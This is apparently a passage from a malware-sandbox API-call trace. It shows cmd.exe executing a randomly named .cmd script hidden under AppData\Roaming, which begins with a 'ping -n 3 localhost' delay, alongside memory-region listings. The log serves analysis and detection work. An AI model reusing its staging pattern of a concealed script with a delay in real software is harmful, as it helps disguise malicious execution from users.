end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5699 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 5700 start_va = 0x420000 end_va = 0x4e7fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 5701 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5702 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5703 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 5704 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 5705 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5706 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 5707 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 5708 start_va = 0x600000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 5709 start_va = 0x1200000 end_va = 0x1362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 5738 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5739 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = 
"\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5740 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5741 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 5742 start_va = 0x1370000 end_va = 0x163efff entry_point = 0x1370000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 58 os_tid = 0xcf0 [0109.420] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fc9c | out: lpSystemTimeAsFileTime=0x28fc9c*(dwLowDateTime=0x7f39bcc0, dwHighDateTime=0x1d440a9)) [0109.420] GetCurrentProcessId () returned 0xcec [0109.420] GetCurrentThreadId () returned 0xcf0 [0109.420] GetTickCount () returned 0x26306 [0109.421] QueryPerformanceCounter (in: lpPerformanceCount=0x28fc94 | out: lpPerformanceCount=0x28fc94*=16620974359) returned 1 [0109.421] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0109.421] __set_app_type (_Type=0x1) [0109.421] __p__fmode () returned 0x76b331f4 [0109.421] __p__commode () returned 0x76b331fc [0109.421] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0109.422] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0109.422] GetCurrentThreadId () returned 0xcf0 [0109.422] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcf0) returned 0x38 [0109.422] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0109.422] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 
[0109.422] SetThreadUILanguage (LangId=0x0) returned 0x409 [0109.422] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0109.422] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fc2c | out: phkResult=0x28fc2c*=0x0) returned 0x2 [0109.422] VirtualQuery (in: lpAddress=0x28fc63, lpBuffer=0x28fbfc, dwLength=0x1c | out: lpBuffer=0x28fbfc*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0109.422] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28fbfc, dwLength=0x1c | out: lpBuffer=0x28fbfc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0109.422] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28fbfc, dwLength=0x1c | out: lpBuffer=0x28fbfc*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0109.422] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28fbfc, dwLength=0x1c | out: lpBuffer=0x28fbfc*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0109.422] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28fbfc, dwLength=0x1c | out: lpBuffer=0x28fbfc*(BaseAddress=0x290000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0109.423] GetConsoleOutputCP () returned 0x1b5 [0109.423] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0109.423] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0109.423] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.423] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) 
returned 1 [0109.423] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.423] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0109.423] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.423] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0109.423] _get_osfhandle (_FileHandle=0) returned 0x3 [0109.423] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0109.424] _get_osfhandle (_FileHandle=0) returned 0x3 [0109.424] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0109.424] GetEnvironmentStringsW () returned 0x330150* [0109.424] FreeEnvironmentStringsW (penv=0x330150) returned 1 [0109.424] GetEnvironmentStringsW () returned 0x330150* [0109.424] FreeEnvironmentStringsW (penv=0x330150) returned 1 [0109.424] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28eb9c | out: phkResult=0x28eb9c*=0x40) returned 0x0 [0109.424] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x0, lpData=0x28eba8*=0x0, lpcbData=0x28eba0*=0x1000) returned 0x2 [0109.424] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x4, lpData=0x28eba8*=0x1, lpcbData=0x28eba0*=0x4) returned 0x0 [0109.424] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x0, lpData=0x28eba8*=0x1, lpcbData=0x28eba0*=0x1000) returned 0x2 [0109.424] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x4, lpData=0x28eba8*=0x0, lpcbData=0x28eba0*=0x4) returned 0x0 [0109.425] 
RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x4, lpData=0x28eba8*=0x40, lpcbData=0x28eba0*=0x4) returned 0x0 [0109.425] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x4, lpData=0x28eba8*=0x40, lpcbData=0x28eba0*=0x4) returned 0x0 [0109.425] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x0, lpData=0x28eba8*=0x40, lpcbData=0x28eba0*=0x1000) returned 0x2 [0109.425] RegCloseKey (hKey=0x40) returned 0x0 [0109.425] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28eb9c | out: phkResult=0x28eb9c*=0x40) returned 0x0 [0109.425] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x0, lpData=0x28eba8*=0x40, lpcbData=0x28eba0*=0x1000) returned 0x2 [0109.425] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x4, lpData=0x28eba8*=0x1, lpcbData=0x28eba0*=0x4) returned 0x0 [0109.425] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x0, lpData=0x28eba8*=0x1, lpcbData=0x28eba0*=0x1000) returned 0x2 [0109.425] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x4, lpData=0x28eba8*=0x0, lpcbData=0x28eba0*=0x4) returned 0x0 [0109.425] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", 
lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x4, lpData=0x28eba8*=0x9, lpcbData=0x28eba0*=0x4) returned 0x0 [0109.425] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x4, lpData=0x28eba8*=0x9, lpcbData=0x28eba0*=0x4) returned 0x0 [0109.425] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28eba4, lpData=0x28eba8, lpcbData=0x28eba0*=0x1000 | out: lpType=0x28eba4*=0x0, lpData=0x28eba8*=0x9, lpcbData=0x28eba0*=0x1000) returned 0x2 [0109.425] RegCloseKey (hKey=0x40) returned 0x0 [0109.425] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886356 [0109.425] srand (_Seed=0x5b886356) [0109.425] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd\"" [0109.425] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd\"" [0109.425] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0109.426] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3319b8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0109.426] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0109.426] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.426] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0109.426] GetEnvironmentVariableW 
(in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.426] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0109.426] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0109.426] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0109.426] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0109.426] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0109.426] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0109.426] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0109.426] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0109.426] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0109.426] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f968 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0109.426] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f968, lpFilePart=0x28f964 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f964*="Desktop") returned 0x18 [0109.426] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0109.427] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f6e4 | out: lpFindFileData=0x28f6e4) returned 0x32ffe0 [0109.427] FindClose (in: hFindFile=0x32ffe0 | out: hFindFile=0x32ffe0) returned 1 [0109.427] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f6e4 | out: lpFindFileData=0x28f6e4) returned 0x32ffe0 [0109.427] FindClose (in: hFindFile=0x32ffe0 | out: hFindFile=0x32ffe0) returned 1 [0109.427] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f6e4 | out: lpFindFileData=0x28f6e4) returned 0x32ffe0 [0109.427] FindClose (in: hFindFile=0x32ffe0 | out: hFindFile=0x32ffe0) returned 1 [0109.427] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0109.427] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0109.427] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0109.428] GetEnvironmentStringsW () returned 0x330150* [0109.428] FreeEnvironmentStringsW (penv=0x330150) returned 1 [0109.428] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0109.430] GetConsoleOutputCP () returned 0x1b5 [0109.430] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0109.430] GetUserDefaultLCID () returned 0x409 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28faa8, cchData=128 | out: lpLCData="0") returned 2 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28faa8, cchData=128 | out: lpLCData="0") returned 2 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28faa8, cchData=128 | out: lpLCData="1") returned 2 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") 
returned 4 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0109.431] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0109.431] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0109.432] GetConsoleTitleW (in: lpConsoleTitle=0x3301e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.432] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0109.433] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0109.433] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0109.433] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0109.436] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd", _String2=")") returned 58 [0109.436] _wcsicmp (_String1="FOR", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd") returned 3 [0109.436] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd") returned 3 [0109.436] _wcsicmp (_String1="IF", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd") returned 6 [0109.437] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd") returned 6 [0109.437] _wcsicmp (_String1="REM", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd") returned 15 [0109.437] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd") returned 15 [0109.437] 
GetConsoleTitleW (in: lpConsoleTitle=0x28f7a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.475] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.475] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.475] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f55c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f554, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f554*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0109.475] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0109.476] SetErrorMode (uMode=0x0) returned 0x0 [0109.476] SetErrorMode (uMode=0x1) returned 0x0 [0109.476] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.", nBufferLength=0x208, lpBuffer=0x33dc08, lpFilePart=0x28f2c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy", lpFilePart=0x28f2c0*="vMfCCeRYkvQy") returned 0x2d [0109.476] SetErrorMode (uMode=0x0) returned 0x1 [0109.476] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\.") returned 1 [0109.476] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0109.481] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0109.481] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd", fInfoLevelId=0x1, lpFindFileData=0x28f05c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f05c) returned 0x3308f0 [0109.481] FindClose (in: hFindFile=0x3308f0 | out: hFindFile=0x3308f0) returned 1 [0109.481] _wcsicmp (_String1=".cmd", _String2=".CMD") returned 0 [0109.481] GetConsoleTitleW (in: 
lpConsoleTitle=0x28f534, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0109.481] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x769f0000 [0109.484] GetProcAddress (hModule=0x769f0000, lpProcName="SaferIdentifyLevel") returned 0x76a12102 [0109.485] IdentifyCodeAuthzLevelW () returned 0x1 [0109.490] GetProcAddress (hModule=0x769f0000, lpProcName="SaferComputeTokenFromLevel") returned 0x76a13352 [0109.490] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0109.490] GetProcAddress (hModule=0x769f0000, lpProcName="SaferCloseLevel") returned 0x76a13825 [0109.490] CloseCodeAuthzLevel () returned 0x1 [0109.491] SetErrorMode (uMode=0x0) returned 0x0 [0109.491] SetErrorMode (uMode=0x1) returned 0x0 [0109.491] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd", nBufferLength=0x104, lpBuffer=0x3304e8, lpFilePart=0x28f420 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd", lpFilePart=0x28f420*="Gy2dwmVF.cmd") returned 0x3a [0109.491] SetErrorMode (uMode=0x0) returned 0x1 [0109.491] CmdBatNotification () returned 0x0 [0109.491] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\Gy2dwmVF.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\gy2dwmvf.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f464, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0109.491] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0109.491] _get_osfhandle (_FileHandle=3) returned 0x58 [0109.491] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.491] _get_osfhandle (_FileHandle=3) returned 0x58 [0109.491] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) 
returned 0x0 [0109.491] ReadFile (in: hFile=0x58, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x28f448, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x28f448*=0x91, lpOverlapped=0x0) returned 1 [0109.491] SetFilePointer (in: hFile=0x58, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0109.492] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=21, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 localhost\r\n") returned 21 [0109.492] _get_osfhandle (_FileHandle=3) returned 0x58 [0109.492] GetFileType (hFile=0x58) returned 0x1 [0109.492] _get_osfhandle (_FileHandle=3) returned 0x58 [0109.492] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0109.492] _wcsicmp (_String1="ping", _String2=")") returned 71 [0109.492] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0109.492] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0109.492] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0109.492] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0109.492] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0109.492] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0109.493] _tell (_FileHandle=3) returned 21 [0109.493] _close (_FileHandle=3) returned 0 [0109.494] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x28f21c | out: _Buffer="\r\n") returned 2 [0109.494] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.494] GetFileType (hFile=0x7) returned 0x2 [0109.494] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.494] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f1dc | out: lpMode=0x28f1dc) returned 1 [0109.494] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.494] WriteConsoleW (in: hConsoleOutput=0x7, 
lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f208, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28f208*=0x2) returned 1 [0109.494] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0109.494] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0109.494] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x28f218 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0109.494] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x28f218 | out: _Buffer=">") returned 1 [0109.494] _get_osfhandle (_FileHandle=1) returned 0x7 [0109.494] GetFileType (hFile=0x7) returned 0x2 [0109.494] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.494] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f1e0 | out: lpMode=0x28f1e0) returned 1 